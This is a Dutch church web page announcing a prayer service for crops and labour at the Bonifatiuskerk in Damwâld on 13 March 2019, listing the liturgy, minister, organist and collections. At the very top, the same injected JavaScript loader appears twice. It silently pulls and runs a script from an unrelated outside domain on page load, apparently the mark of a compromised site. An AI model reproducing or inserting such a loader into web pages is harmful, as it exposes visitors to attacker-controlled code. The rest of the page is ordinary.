;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Bidstond voor gewas en arbeid woensdag 13 maart 2019 19:30 uur - PKN Damwâld
woensdag 13 maart 2019
19:30 uur
Bidstond

Bidstond voor gewas en arbeid woensdag 13 maart 2019 19:30 uur

Informatie

Voorganger:Ds. G.J. Otter
Organist:Nienke van der Heide-Visser
Mededeling:Bidstond
Liturgie
Lied voor de dienst Psalm 146 : 1 en 3
Welkom
We zingen: Elb 58
Stil gebed, Votum en groet
We zingen: Ps 36 : 2
Geloofsbelijdenis
We zingen: Gez 465 : 1 en 3
Gebed
We lezen: Ps.127: 1 en 2 Lc.19: 11 - 27 en Gal. 6: 7-10
We zingen: Ps.127: 1 en 2
Preek .
We zingen: Gez.287:1,3 en 4
Dankzegging en voorbede Collecte
Collecte
Slotlied Gez.393:1,2 en 4
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Stichting Children's Relief

Children's Relief ondersteunt kinderen die in Oost-Europa opgroeien in achterstandssituaties. Zij zijn het meest kwetsbaar en hebben weinig kans op een goede toekomst. De projecten van Children's Relief richten zich op scholing, opvoeding, zorg en aandacht. Het welzijn van de kinderen staat voorop. Zij moeten zich kunnen ontplooien tot gezonde volwassenen. Zo kunnen zij betere kansen krijgen in de maatschappij. Children's Relief heeft in haar geschiedenis al veel kinderen kunnen helpen en begeleiden naar een beter bestaan. Stichting Children's Relief is verbonden met Stichting OostEuropa Zending.

Tweede collecte: Kerk
Uitganscollecte: Bidstondcollecte